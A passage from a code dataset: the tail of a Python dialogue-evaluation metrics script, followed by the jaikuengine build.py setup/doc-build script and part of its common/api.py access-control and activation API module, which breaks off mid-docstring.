% (
class_types[ct],
ct,
recall,
np.sum(cls_acc[ct]),
len(cls_acc[ct]),
precision,
f1,
acc,
c_tp[ct],
c_tn[ct],
c_fp[ct],
c_fn[ct],
)
)
print("Confusion matrix:")
for cl in range(len(class_types)):
print(" %s" % (cl), end="")
print("")
for cl_a in range(len(class_types)):
print("%s " % (cl_a), end="")
for cl_b in range(len(class_types)):
if len(cls_acc[cl_a]) > 0:
print("%.2f " % (np.sum(cls_conf[cl_a][cl_b]) / len(cls_acc[cl_a])), end="")
else:
print("---- ", end="")
print("")
acc = np.mean(goal_correctness)
acc_list.append((fp, acc))
acc_list_s = sorted(acc_list, key=lambda tup: tup[1], reverse=True)
for (fp, acc) in acc_list_s:
# import pdb; pdb.set_trace()
print("Joint goal acc: %g, %s" % (acc, fp))
``` |
{
"source": "jimpick/jaikuengine",
"score": 2
} |
#### File: jimpick/jaikuengine/build.py
```python
import glob
import logging
import md5
import os
import random
import re
import sys
import StringIO
import time
import zipfile
import os.path
ZIP_SKIP_RE = re.compile('\.svn|\.pyc|\.[pm]o')
IGNORED_CONTRIB = ('admin', 'gis', 'comments', 'localflavor', 'databrowse')
ROOT_DIR = os.path.dirname(__file__)
DOC_DIR = os.path.join(ROOT_DIR, 'doc')
RST_TEMPLATE_PATH = os.path.join(DOC_DIR, 'template.rst2html')
API_TEMPLATE_DIR = os.path.join(ROOT_DIR, 'api', 'templates')
HELP_SITE_NAME = """
Your site name is important, it's the name of your site!
"""
HELP_SECRET_KEY = """
This is a secret key, you should keep it secret.
"""
HELP_GAE_DOMAIN = """
This is the appspot.com domain you are going to host your app at. Even if you
are running under a hosted domain you will want to set this so that you can
allow SSL for logins.
"""
HELP_HOSTED_DOMAIN_ENABLED = """
Are you hosting this on your own domain instead of YOUR_APP.appspot.com? If so
you need to check this box and enter the domain you are using below.
"""
HELP_HOSTED_DOMAIN = """
If you checked the box to Enable Hosted Domain above you will need to enter
the domain you are hosting on here.
"""
HELP_NS_DOMAIN = """
This is the namespace you plan on using for the nicknames of your users, a
safe bet is to set this to be the same as Hosted Domain above, or to your
Google App Engine Domain if you did not enable Hosted Domains.
"""
HELP_ROOT_NICK = """
This is the nick for the admin user. It should probably look something like
admin@<Your Namespace Domain>
"""
HELP_SSL_LOGIN_ENABLED = """
Enabling SSL logins is a good idea for the safety of your users. If you have
enabled Hosted Domains above, your login page will be shown via the Google App Engine Domain listed above.
"""
HELP_DEFAULT_FROM_EMAIL = """
This the email address mail from your app will be sent from, it needs to be
one of the developers of the app (i.e. you) for App Engine to accept it.
"""
def bootstrap(only_check_for_zips=False):
logging.info('Beginning bootstrap...')
l = os.listdir('vendor')
for vendor_lib in l:
if vendor_lib.startswith('.'):
continue
if only_check_for_zips and os.path.exists('%s.zip' % vendor_lib):
continue
logging.info('Building zip for %s...' % vendor_lib)
zip_vendor_lib(vendor_lib)
logging.info('Finishing bootstrap.')
def monkey_patch_skipped_files():
logging.info('Monkey patching dev_appserver...')
from google.appengine.tools import dev_appserver as da
def _patch(logical_filename, normcase=os.path.normcase):
"""Determines if a file's path is accessible.
This is an internal part of the IsFileAccessible implementation.
Args:
logical_filename: Absolute path of the file to check.
normcase: Used for dependency injection.
Returns:
True if the file is accessible, False otherwise.
"""
if da.IsPathInSubdirectories(logical_filename, [da.FakeFile._root_path],
normcase=normcase):
relative_filename = logical_filename[len(da.FakeFile._root_path):]
#if da.FakeFile._skip_files.match(relative_filename):
# logging.warning('Blocking access to skipped file "%s"',
# logical_filename)
# return False
if da.FakeFile._static_file_config_matcher.IsStaticFile(relative_filename):
logging.warning('Blocking access to static file "%s"',
logical_filename)
return False
if logical_filename in da.FakeFile.ALLOWED_FILES:
return True
if da.IsPathInSubdirectories(logical_filename,
da.FakeFile.ALLOWED_SITE_PACKAGE_DIRS,
normcase=normcase):
return True
allowed_dirs = da.FakeFile._application_paths | da.FakeFile.ALLOWED_DIRS
if (da.IsPathInSubdirectories(logical_filename,
allowed_dirs,
normcase=normcase) and
not da.IsPathInSubdirectories(logical_filename,
da.FakeFile.NOT_ALLOWED_DIRS,
normcase=normcase)):
return True
return False
da.FakeFile._IsFileAccessibleNoCache = staticmethod(_patch)
def generate_api_docs():
logging.info('Generating api docs...')
from epydoc import docparser
try:
import roman
except ImportError:
print ("Could not import module 'roman,' docutils has not been installed"
"properly")
print "Please install docutils: http://docutils.sourceforge.net"
sys.exit(1)
from common import api
a = docparser.parse_docs(name='common.api')
variables = a.apidoc_links(imports=False,
packages=False,
submodules=False,
bases=False,
subclasses=False,
private=False,
overrides=False)
public_api_methods = api.PublicApi.methods.keys()
public_decorators = ['throttle', 'owner_required']
allowed_names = public_api_methods + public_decorators
for v in variables:
if v.name in public_api_methods:
prefix = "method"
elif v.name in public_decorators:
prefix = "deco"
else:
continue
filename = '%s_%s.txt' % (prefix, v.name)
path = os.path.join(DOC_DIR, filename)
logging.info(' for %s...' % v.name)
docs = rst_docs(v.value)
f = open(path, 'w')
f.write(docs)
f.close()
logging.info('Finished generating api docs.')
def build_docs():
logging.info('Building html docs...')
txts = glob.glob(os.path.join(DOC_DIR, '*.txt'))
for t in txts:
basename = os.path.basename(t)
baseroot, ext = os.path.splitext(basename)
outname = os.path.join(API_TEMPLATE_DIR, 'built_%s.html' % baseroot)
logging.info(' for %s...' % baseroot)
infile = open(t)
outfile = open(outname, 'w')
rst_to_html(infile, outfile)
infile.close()
outfile.close()
logging.info('Finished building html docs.')
def check_config():
# TODO(termie):
pass
def build_config(write_to_file=False):
d = {}
d['SITE_NAME'] = get_input(HELP_SITE_NAME, 'Enter a site name')
d['SECRET_KEY'] = get_input(HELP_SECRET_KEY,
'Enter a secret key',
generate_secret_key())
d['GAE_DOMAIN'] = get_input(HELP_GAE_DOMAIN,
'Enter an appspot domain')
d['HOSTED_DOMAIN_ENABLED'] = get_input(HELP_HOSTED_DOMAIN_ENABLED,
'Enabled Hosted Domains (yes|no)',
'yes',
yesno)
if d['HOSTED_DOMAIN_ENABLED']:
d['HOSTED_DOMAIN'] = get_input(HELP_HOSTED_DOMAIN,
'Enter your hosted domain (without www.)')
if d['HOSTED_DOMAIN_ENABLED']:
default_ns = d['HOSTED_DOMAIN']
d['DOMAIN'] = 'www.%s' % d['HOSTED_DOMAIN']
else:
default_ns = d['GAE_DOMAIN']
d['DOMAIN'] = d['GAE_DOMAIN']
d['NS_DOMAIN'] = get_input(HELP_NS_DOMAIN,
'Enter your namespace domain',
default_ns)
default_root = 'admin@%s' % d['NS_DOMAIN']
d['ROOT_NICK'] = get_input(HELP_ROOT_NICK,
'Enter the nick for your admin user',
default_root)
d['SSL_LOGIN_ENABLED'] = get_input(HELP_SSL_LOGIN_ENABLED,
'Enable SSL login (yes|no)',
'yes',
yesno)
d['DEFAULT_FROM_EMAIL'] = get_input(HELP_DEFAULT_FROM_EMAIL,
'Enter an email address to send from')
o = []
for k, v in d.iteritems():
o.append('%s = %r\n' % (k, v))
if write_to_file:
print
print 'Writing your settings to local_settings.py...',
f = open('local_settings.py', 'w')
f.write('\n'.join(o))
f.close()
print ' done.'
else:
print
print 'Your settings:'
print
print '\n'.join(o)
def clean(skip_zip=False):
# TODO(termie): running this multiple times will tend to create zip files
# and then delete them
logging.info('Removing built files...')
# clean up docs, built html and zip files
if not skip_zip:
zipfiles = glob.glob(os.path.join(ROOT_DIR, '*.zip'))
else:
zipfiles = []
api_methods = glob.glob(os.path.join(DOC_DIR, 'method_*'))
api_decos = glob.glob(os.path.join(DOC_DIR, 'deco_*'))
html_docs = glob.glob(os.path.join(API_TEMPLATE_DIR, 'built_*'))
all_to_remove = zipfiles + api_methods + api_decos + html_docs
for filename in all_to_remove:
os.unlink(filename)
logging.info('Finished removing built files.')
# Helpers
def generate_secret_key():
bits = random.getrandbits(10)
return md5.new(str(time.time()) + str(bits)).hexdigest()
def required(s):
if not s:
raise ValueError('Invalid entry, cannot be empty')
return s
def yesno(s):
s = s.lower()
if s not in ('y', 'n', 'yes', 'no'):
raise ValueError('Invalid entry, please type yes or no')
return (False, True)[s.startswith('y')]
def get_input(message, prompt, default='', cleaner=required):
print message
real_prompt = '%s [%s]: ' % (prompt, default)
s = raw_input(real_prompt)
if not s and default:
s = default
try:
o = cleaner(s)
print '==============================='
except ValueError, e:
print
print 'Error:', e.message
o = get_input(message, prompt, default, cleaner)
return o
def rst_to_html(infile, outfile):
import docutils.core
docutils.core.publish_file(
source=infile,
destination=outfile,
writer_name='html',
settings_overrides={'default_template_path': RST_TEMPLATE_PATH,
'doctitle_xform': False}
)
def rst_docs(api_doc):
from epydoc import apidoc
sig_template = '**%(shortname)s** (%(args_list)s)'
dec_template = ' * %(decorator)s'
shortname = str(api_doc.canonical_name).split('.')[-1]
args_list = ', '.join(api_doc.posargs)
if api_doc.kwarg:
args_list += ', \*\*%s' % api_doc.kwarg
o = [sig_template % {'shortname': shortname, 'args_list': args_list},
'']
#for d in api_doc.decorators:
# o.append(dec_template % {'decorator': d})
o.append('')
if api_doc.docstring != apidoc.UNKNOWN:
o.append(api_doc.docstring)
else:
o.append('No additional documentation')
return '\n'.join(o)
def _strip_contrib(dirnames):
for d in IGNORED_CONTRIB:
try:
dirnames.remove(d)
except ValueError:
pass
def zip_vendor_lib(lib):
f = zipfile.ZipFile('%s.zip' % lib, 'w')
for dirpath, dirnames, filenames in os.walk('vendor/%s' % lib):
if dirpath == os.path.join('vendor', lib, 'contrib'):
_strip_contrib(dirnames)
for filename in filenames:
name = os.path.join(dirpath, filename)
if ZIP_SKIP_RE.search(name):
logging.debug('Skipped (skip_re): %s', name)
continue
if not os.path.isfile(name):
logging.debug('Skipped (isfile): %s', name)
continue
logging.debug('Adding %s...', name)
f.write(name, name[len('vendor/'):], zipfile.ZIP_DEFLATED)
f.close()
if __name__ == "__main__":
command = ''
if len(sys.argv) > 1:
command = sys.argv[1]
if command.startswith('config'):
build_config(True)
```
#### File: jaikuengine/common/api.py
```python
import random
import re
import datetime
import logging
from cleanliness import cleaner
from django.conf import settings
from google.appengine.ext import db
from google.appengine.api import urlfetch
from google.appengine.api import images
from common.models import Stream, StreamEntry, InboxEntry, Actor, Relation
from common.models import Subscription, Invite, OAuthConsumer, OAuthRequestToken
from common.models import OAuthAccessToken, Image, Activation
from common.models import KeyValue, Presence
from common.models import AbuseReport
from common.models import Task
from common.models import PRIVACY_PRIVATE, PRIVACY_CONTACTS, PRIVACY_PUBLIC
from common import clean
from common import clock
from common import exception
from common import imageutil
from common import mail
from common import memcache
from common import models
from common import normalize
from common import patterns
from common import properties
from common import throttle
from common import util
from common import validate
from common.protocol import sms
from common.protocol import xmpp
NO_ACCESS = 'none'
READ_ACCESS = 'read'
WRITE_ACCESS = 'write'
DELETE_ACCESS = 'delete'
ADMIN_ACCESS = 'admin'
ACCESS_LEVELS = [NO_ACCESS,
READ_ACCESS,
WRITE_ACCESS,
DELETE_ACCESS,
ADMIN_ACCESS]
ROOT = Actor(nick=settings.ROOT_NICK, type='user')
ROOT.access_level = ADMIN_ACCESS
# Max length of a message. Conciseness is a virtue.
# UIs should prevent posting longer messages. API will truncate
# posts longer than this.
MAX_POST_LENGTH = 140
# How many contacts we are willing to count to update an actor's
# contact_count or follower_count properties
CONTACT_COUNT_THRESHOLD = 100
# Maximum number of channels a user is allowed to admin at a time
MAX_ADMINS_PER_ACTOR = 48
# The default length of a task's visibility lock in seconds
DEFAULT_TASK_EXPIRE = 10
# The maximum number of followers to process per task iteration of inboxes
MAX_FOLLOWERS_PER_INBOX = 100
MAX_NOTIFICATIONS_PER_TASK = 100
# The maximum number of followers we can notify per task iteration
# The first notification type to handle
FIRST_NOTIFICATION_TYPE = 'im'
AVATAR_IMAGE_SIZES = { 'u': (30, 30),
't': (50, 50),
'f': (60, 60),
'm': (175, 175),
}
# Wrap utcnow so that it can be mocked in tests. We can't replace the function
# in the datetime module because it's an extension, not a python module.
utcnow = lambda: clock.utcnow()
RE_NS_DOMAIN = settings.NS_DOMAIN.replace('.', r'\.')
channel_post_re = re.compile(
r'^(?P<channel>#[a-zA-Z][a-zA-Z0-9]{%d,%d}(?:@%s)?)'
r':?\s+' # separator
r'(?P<message>.*)' # message
% (clean.NICK_MIN_LENGTH - 1, clean.NICK_MAX_LENGTH - 1, RE_NS_DOMAIN)
)
smashed_title_re = re.compile(r'(?:(?:^|\s+)(\w))')
# little helper for code reuse
def _item_from_args_kw(f, allowed, args, kw):
""" attempt to fetch an identifying key from the list of args and kw,
allowed - list of allowable kw key names
args - list of args
kw - dict of key-value args
"""
x = None
for possible in allowed:
x = kw.get(possible)
if x:
break
if not x:
x = args[0]
return f(ROOT, x)
def _actor_from_args_kw(allowed, args, kw):
return _item_from_args_kw(actor_get, allowed, args, kw)
def _entry_from_args_kw(allowed, args, kw):
return _item_from_args_kw(entry_get, allowed, args, kw)
def _stream_from_args_kw(allowed, args, kw):
return _item_from_args_kw(stream_get, allowed, args, kw)
# Better Access Control
def has_access(actor_ref, access_level):
if not actor_ref:
return False
# TODO(termie): I don't really like that the default access is full access
# but changing that in any way makes testing much more
# verbose, requiring us to set access levels every time we
# fetch an actor to use. Some work can probably be done to
# put the site into some testing mode where the default
# access level for testing is DELETE_ACCESS at which point
# this can become NO_ACCESS again
test_access = getattr(actor_ref, 'access_level', DELETE_ACCESS)
if ACCESS_LEVELS.index(access_level) <= ACCESS_LEVELS.index(test_access):
return True
return False
def actor_owns_actor(actor_ref, other_ref):
if not actor_ref or not other_ref:
return False
# actors own themselves
if actor_ref.nick == other_ref.nick:
return True
# admins own anything
if has_access(actor_ref, ADMIN_ACCESS):
return True
# if this is a channel, it is owned by its admins
if (other_ref.is_channel()
and channel_has_admin(ROOT, other_ref.nick, actor_ref.nick)
):
return True
# well, we tried.
return False
def actor_owns_stream(actor_ref, stream_ref):
if not stream_ref:
return False
# streams are owned by whoever owns the actor that owns a stream
stream_owner_ref = actor_get_safe(ROOT, stream_ref.owner)
if not stream_owner_ref:
# this stream has no owner, the owner is deleted, something like that
# we shouldn't ever really be getting here
return False
return actor_owns_actor(actor_ref, stream_owner_ref)
def actor_owns_entry(actor_ref, entry_ref):
if not entry_ref:
return False
# owned by whoever owns the actor whom wrote the entry
entry_actor_ref = actor_get_safe(ROOT, entry_ref.actor)
if not entry_actor_ref:
# this entry has no author, the author is deleted, something like that
# we shouldn't ever really be getting here
return False
if actor_owns_actor(actor_ref, entry_actor_ref):
return True
# owned by whoever owns the actor whom owns the stream the entry is in
entry_owner_ref = actor_get_safe(ROOT, entry_ref.owner)
if not entry_owner_ref:
# this stream has no owner, the owner is deleted, something like that
# we shouldn't ever really be getting here
return False
if actor_owns_actor(actor_ref, entry_owner_ref):
return True
# if this is a comment we have to check for the entry as well
# this is recursive, but should be okay since we can't comment on comments
if entry_ref.entry:
entry_parent_ref = entry_get_safe(ROOT, entry_ref.entry)
if actor_owns_entry(actor_ref, entry_parent_ref):
return True
return False
def actor_can_view_actor(actor_ref, other_ref):
""" actor_ref can view other_ref """
if not other_ref:
return False
# if other is public
if other_ref.is_public():
return True
# if we're not public we better have an actor_ref
if not actor_ref:
return False
# if we are the owner
if actor_owns_actor(actor_ref, other_ref):
return True
# other_ref is restricted
if other_ref.is_restricted():
# and we are a contact
if (not other_ref.is_channel()
and actor_has_contact(ROOT, other_ref.nick, actor_ref.nick)
):
return True
# is a channel and we are a member (admin covered above by owner)
if (other_ref.is_channel()
and channel_has_member(ROOT, other_ref.nick, actor_ref.nick)
):
return True
return False
def actor_can_view_stream(actor_ref, stream_ref):
if not stream_ref:
return False
# if stream is public
if stream_ref.is_public():
return True
if actor_owns_stream(actor_ref, stream_ref):
return True
if stream_ref.is_restricted():
stream_owner_ref = actor_get_safe(ROOT, stream_ref.owner)
if actor_can_view_actor(actor_ref, stream_owner_ref):
return True
# special case the comments stream, because it is private but comments take
# on the privacy of the entries they are on
# this allows anybody to see that the comments stream exists while giving
# no specific access to any actual comments held therein
# unfortunately some of the imported data has type == 'comment' and some
# type == 'comments'.
if stream_ref.type == 'comment' or stream_ref.type == 'comments':
return True
return False
def actor_can_view_entry(actor_ref, entry_ref):
if not entry_ref:
return False
if actor_owns_entry(actor_ref, entry_ref):
return True
# if not a comment inherit the visibility of the stream
if not entry_ref.entry:
stream_ref = stream_get_safe(ROOT, entry_ref.stream)
if actor_can_view_stream(actor_ref, stream_ref):
return True
# if this is a comment we want to check the parent entry's stream
if entry_ref.entry:
entry_parent_ref = entry_get_safe(ROOT, entry_ref.entry)
if actor_can_view_entry(actor_ref, entry_parent_ref):
return True
return False
# Better Access Control Decorators
def access_required(access_level):
def _decorator(f):
def _wrap(api_user, *args, **kw):
if not has_access(api_user, access_level):
raise exception.ApiException(
exception.PERMISSION_ERROR,
'You need %s access or above to use this method' % access_level)
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, '%s_required' % access_level)
return _wrap
return _decorator
write_required = access_required(WRITE_ACCESS)
delete_required = access_required(DELETE_ACCESS)
admin_required = access_required(ADMIN_ACCESS)
def append_meta(f, key, value=None):
if not hasattr(f, 'meta'):
f.meta = []
f.meta.append((key, value))
return f.meta
def owner_required(f):
def _wrap(api_user, *args, **kw):
actor_ref = _actor_from_args_kw(['nick', 'owner', 'channel'], args, kw)
if not actor_owns_actor(api_user, actor_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'owner_required')
return _wrap
def owner_required_by_target(f):
def _wrap(api_user, *args, **kw):
# TODO(termie): I don't really like that this looks at the second
# arg, it feels hacky.
target = kw.get('target')
if target is None:
target = args[1]
nick = util.get_user_from_topic(target)
actor_ref = actor_get_safe(ROOT, nick)
if not actor_ref:
raise exception.ApiException(0x00, 'Actor does not exist: %s' % nick)
if not actor_owns_actor(api_user, actor_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'owner_required_by_target')
return _wrap
def owner_required_by_entry(f):
def _wrap(api_user, *args, **kw):
entry_ref = _entry_from_args_kw(['entry', 'comment'], args, kw)
if not actor_owns_entry(api_user, entry_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'owner_required_by_entry')
return _wrap
# TODO(termie): this could probably have a better name
def viewable_required(f):
""" assert that the calling user is allowed to view this """
def _wrap(api_user, *args, **kw):
if not has_access(api_user, ADMIN_ACCESS):
actor_ref = _actor_from_args_kw(['channel', 'nick', 'owner'], args, kw)
if not actor_can_view_actor(api_user, actor_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'viewable_required')
return _wrap
def viewable_required_by_entry(f):
def _wrap(api_user, *args, **kw):
if not has_access(api_user, ADMIN_ACCESS):
entry_ref = _entry_from_args_kw(['entry', 'comment'], args, kw)
if not actor_can_view_entry(api_user, entry_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'viewable_required_by_entry')
return _wrap
def viewable_required_by_stream(f):
def _wrap(api_user, *args, **kw):
if not has_access(api_user, ADMIN_ACCESS):
stream_ref = _stream_from_args_kw(['stream'], args, kw)
if not actor_can_view_stream(api_user, stream_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'viewable_required_by_stream')
return _wrap
public_owner_or_contact = viewable_required
public_owner_or_member = viewable_required
public_owner_or_contact_by_entry = viewable_required_by_entry
public_owner_or_contact_by_stream = viewable_required_by_stream
# Throttling
def throttled(**decokw):
def _decorator(f):
def _wrap(api_user, *args, **kw):
throttle.throttle(api_user, f.func_name, **decokw)
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'throttled', decokw)
return _wrap
return _decorator
def catch_image_error(f):
"""Decorator that catches app engine image errors and translates them to
ApiException"""
def _wrap(*args, **kw):
return exception.handle_image_error(f, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'handle_image_error')
return _wrap
# CALLS
#######
#######
#######
@admin_required
def abuse_get_entry(api_user, entry):
entry_ref = entry_get(api_user, entry)
key_name = AbuseReport.key_from(entry=entry_ref.keyname())
abuse_ref = AbuseReport.get_by_key_name(key_name)
return abuse_ref
@write_required
@owner_required # this is only over the reporter, not the entry
def abuse_report_entry(api_user, nick, entry):
""" a user report of an entry as spam
should probably do something interesting but for now we're just
going to keep track of it
"""
entry_ref = entry_get(api_user, entry)
reporter_ref = actor_get(api_user, nick)
# XXX begin transaction
abuse_ref = abuse_get_entry(ROOT, entry)
if abuse_ref:
abuse_ref.reports = list(set(abuse_ref.reports + [reporter_ref.nick]))
abuse_ref.count = len(abuse_ref.reports)
else:
params = {'entry': entry_ref.keyname(),
'actor': entry_ref.actor,
'count': 1,
'reports': [reporter_ref.nick],
}
abuse_ref = AbuseReport(**params)
abuse_ref.put()
# TODO(termie): if we cross some sort of threshold we should probably
# mark a user as an abuser and prevent them from posting
# XXX end transaction
return abuse_ref
#######
#######
#######
@owner_required
def activation_activate_email(api_user, nick, code):
activation_ref = activation_get_code(api_user, nick, 'email', code)
if not activation_ref:
raise exception.ApiException(0x00, 'Invalid code')
existing_ref = actor_lookup_email(ROOT, activation_ref.content)
if existing_ref:
raise exception.ApiException(
0x00, 'That email address has already been activated')
# XXX begin transaction
actor_ref = actor_get(api_user, nick)
relation_ref = email_associate(ROOT, actor_ref.nick, activation_ref.content)
activation_ref.delete()
# XXX end transaction
return relation_ref
@owner_required
def activation_activate_mobile(api_user, nick, code):
activation_ref = activation_get_code(api_user, nick, 'mobile', code)
if not activation_ref:
raise exception.ApiException(0x00, 'Invalid code')
existing_ref = actor_lookup_mobile(ROOT, activation_ref.content)
if existing_ref:
raise exception.ApiException(
0x00, 'That mobile number has already been activated')
# XXX begin transaction
actor_ref = actor_get(api_user, nick)
relation_ref = mobile_associate(ROOT, actor_ref.nick, activation_ref.content)
activation_ref.delete()
# XXX end transaction
return relation_ref
@admin_required
def activation_create(api_user, nick, type, content):
activation_ref = Activation(
actor=nick,
content=content,
code=util.generate_uuid()[:4],
type=type,
)
activation_ref.put()
return activation_ref
@admin_required
def activation_create_email(api_user, nick, email):
validate.email(email)
validate.email_not_activated(email)
return activation_create(api_user, nick, 'email', email)
@admin_required
def activation_create_mobile(api_user, nick, mobile):
clean.mobile(mobile)
if actor_lookup_mobile(api_user, mobile):
raise exception.ApiException(0x00, 'Mobile number already in use')
return activation_create(api_user, nick, 'mobile', mobile)
@admin_required
def activation_get(api_user, nick, type, content):
key_name = Activation.key_from(actor=nick, type=type, content=content)
return Activation.get_by_key_name(key_name)
@owner_required
def activation_get_actor_email(api_user, nick):
query = Activation.gql('WHERE type = :1 AND actor = :2',
'email',
nick)
activations = list(query.run())
return activations
def activation_get_by_email(api_user, email):
query = Activation.gql('WHERE type = :1 AND content = :2',
'email',
email)
activations = list(query.run())
return activations
@owner_required
def activation_get_actor_mobile(api_user, nick):
query = Activation.gql('WHERE type = :1 AND actor = :2',
'mobile',
nick)
activations = list(query.run())
return activations
@owner_required
def activation_get_code(api_user, nick, type, code):
query = Activation.gql('WHERE type = :1 AND actor = :2 AND code = :3',
type,
nick,
code)
activation_ref = query.get()
return activation_ref
@admin_required
def activation_get_email(api_user, nick, email):
return activation_get(api_user, nick, 'email', email)
@admin_required
def activation_get_mobile(api_user, nick, mobile):
return activation_get(api_user, nick, 'mobile', mobile)
@throttled(minute=2, hour=5, day=10)
@owner_required
def activation_request_email(api_user, nick, email):
nick = clean.nick(nick)
email = normalize.email(email)
validate.email(email)
actor_ref = actor_get(api_user, nick)
# can request an activation for an email that already exists
existing_ref = actor_lookup_email(ROOT, email)
if existing_ref:
raise exception.ApiException(0, "That email address is already in use")
# check whether they've already tried to activate this email
# if they have send them the same code
# TODO(tyler): Abstract into activation_get_or_create
activation_ref = activation_get_email(ROOT, nick, email)
if not activation_ref:
old_activations = activation_get_actor_email(ROOT, nick)
for old_activation_ref in old_activations:
old_activation_ref.delete()
activation_ref = activation_create_email(ROOT, nick, email)
subject, message, html_message = mail.email_confirmation_message(api_user,
activation_ref.code)
email_send(ROOT, email, subject, message, html_message=html_message)
return activation_ref
@throttled(minute=2, hour=5, day=10)
@owner_required
def activation_request_mobile(api_user, nick, mobile):
mobile = clean.mobile(mobile)
actor_ref = actor_get(api_user, nick)
# can request an activation for an email that already exists
existing_ref = actor_lookup_mobile(ROOT, mobile)
if existing_ref:
raise exception.ApiException(0, "That mobile number is already in use")
# check whether they've already tried to activate this email
# if they have send them the same code
# TODO(tyler): Abstract into activation_get_or_create
activation_ref = activation_get_mobile(ROOT, nick, mobile)
if not activation_ref:
old_activations = activation_get_actor_mobile(ROOT, nick)
for old_activation_ref in old_activations:
old_activation_ref.delete()
activation_ref = activation_create_mobile(ROOT, nick, mobile)
message = "Your activation code is %s" % activation_ref.code
sms_send(ROOT, api_user.nick, mobile, message)
return activation_ref
#######
#######
#######
@throttled(minute=50, hour=200, day=300, month=500)
@write_required
@owner_required
def actor_add_contact(api_user, owner, target):
"""Adds a one-way relationshp of type 'contact' from owner to target
May be called multiple times for the same owner and target and should
always ensure the same ending conditions.
PARAMS:
* owner - the nick of the follower
* target - the nick of the followed
RETURNS: rel_ref
EXAMPLE API RETURN:
::
{'status': 'ok',
'rv': {'relation': {'owner': '<EMAIL>',
'relation': 'contact',
'target': '<EMAIL>'
}
}
}
"""
owner = clean.nick(owner)
target = clean.nick(target)
owner_ref = actor_get(api_user, owner)
target_ref = actor_get(api_user, target)
if not owner_ref:
raise exception.ApiException(0, 'Actor does not exist: %s' % owner)
if not target_ref:
raise exception.ApiException(0, 'Actor does not exist: %s' % target)
existing_rel_ref = actor_has_contact(ROOT, owner, target)
# XXX start transaction
if not existing_rel_ref:
# Add the relationship
relation = 'contact'
rel_ref = Relation(owner=owner_ref.nick, relation=relation,
target=target_ref.nick,
)
rel_ref.put()
else:
rel_ref = existing_rel_ref
# We're doing some fancy stuff here to keep the counts very precise
# for people with < CONTACT_COUNT_THRESHOLD contacts or followers,
# but less important for those with more than that when a datastore
# error has occurred between creating the relationship and adding the count
if existing_rel_ref:
if owner_ref.extra.get('contact_count', 0) < CONTACT_COUNT_THRESHOLD:
# using ROOT because this is an admin only function and doesn't
# the return value is not given to the calling user
contact_count = actor_count_contacts(ROOT, owner_ref.nick)
owner_ref.extra['contact_count'] = contact_count
if owner_ref.extra.get('follower_count', 0) < CONTACT_COUNT_THRESHOLD:
# using ROOT because this is an admin only function and doesn't
# the return value is not given to the calling user
follower_count = actor_count_followers(ROOT, target_ref.nick)
target_ref.extra['follower_count'] = follower_count
else:
# Increase the counts for each
owner_ref.extra.setdefault('contact_count', 0)
owner_ref.extra['contact_count'] += 1
owner_ref.put()
target_ref.extra.setdefault('follower_count', 0)
target_ref.extra['follower_count'] += 1
target_ref.put()
# Subscribe owner to all of target's streams
streams = stream_get_actor(ROOT, target)
for stream in streams:
sub = subscription_request(api_user,
topic=stream.key().name(),
target='inbox/%s/overview' % owner
)
owner_streams = stream_get_actor(api_user, owner)
for stream in owner_streams:
sub_ref = subscription_get(ROOT,
stream.key().name(),
'inbox/%s/overview' % (target)
)
if sub_ref and sub_ref.state == 'pending':
sub_ref.state = 'subscribed'
sub_ref.put()
# Add contact's recent posts to user's stream.
try:
# ROOT because this is an admin only operation for the moment.
inbox_copy_entries(ROOT, target, owner)
except:
# Private stream, couldn't add.
pass
# XXX end transaction
if not existing_rel_ref:
_notify_new_contact(owner_ref, target_ref)
return ResultWrapper(rel_ref, relation=rel_ref)
@write_required
@owner_required
def actor_add_contacts(api_user, owner, targets):
""" actor_add_contact for each of targets """
o = {}
try:
for target in targets:
o[target] = actor_add_contact(api_user, owner, target)
except exception.ApiException:
o[target] = None
return o
@admin_required
def actor_count_contacts(api_user, nick):
nick = clean.user(nick)
query = Relation.gql('WHERE owner = :1 AND relation = :2',
nick,
'contact')
return query.count()
@admin_required
def actor_count_followers(api_user, nick):
nick = clean.user(nick)
query = Relation.gql('WHERE target = :1 AND relation = :2',
nick,
'contact')
return query.count()
def actor_is_follower(api_user, nick, potential_follower):
"""Determine if one is a follower.
PARAMETERS:
potential_follower - stalker.
RETURNS: boolean
"""
nick = clean.user(nick)
potential_follower = clean.user(potential_follower)
key_name = Relation.key_from(relation='contact',
owner=potential_follower,
target=nick)
rel_ref = Relation.get_by_key_name(key_name)
return rel_ref and True
def actor_is_contact(api_user, nick, potential_contact):
"""Determine if one is a contact.
PARAMETERS:
potential_contact - stalkee.
RETURNS: boolean
"""
nick = clean.user(nick)
potential_contact = clean.user(potential_contact)
key_name = Relation.key_from(relation='contact',
owner=nick,
target=potential_contact)
rel_ref = Relation.get_by_key_name(key_name)
return rel_ref and True
def actor_get(api_user, nick):
"""Get an actor
PARAMS:
* nick - the nick of the actor
RETURNS: actor_ref
EXAMPLE API RETURN:
::
{'status': 'ok',
'rv': {'actor': {'nick': '<EMAIL>',
'privacy': 3,
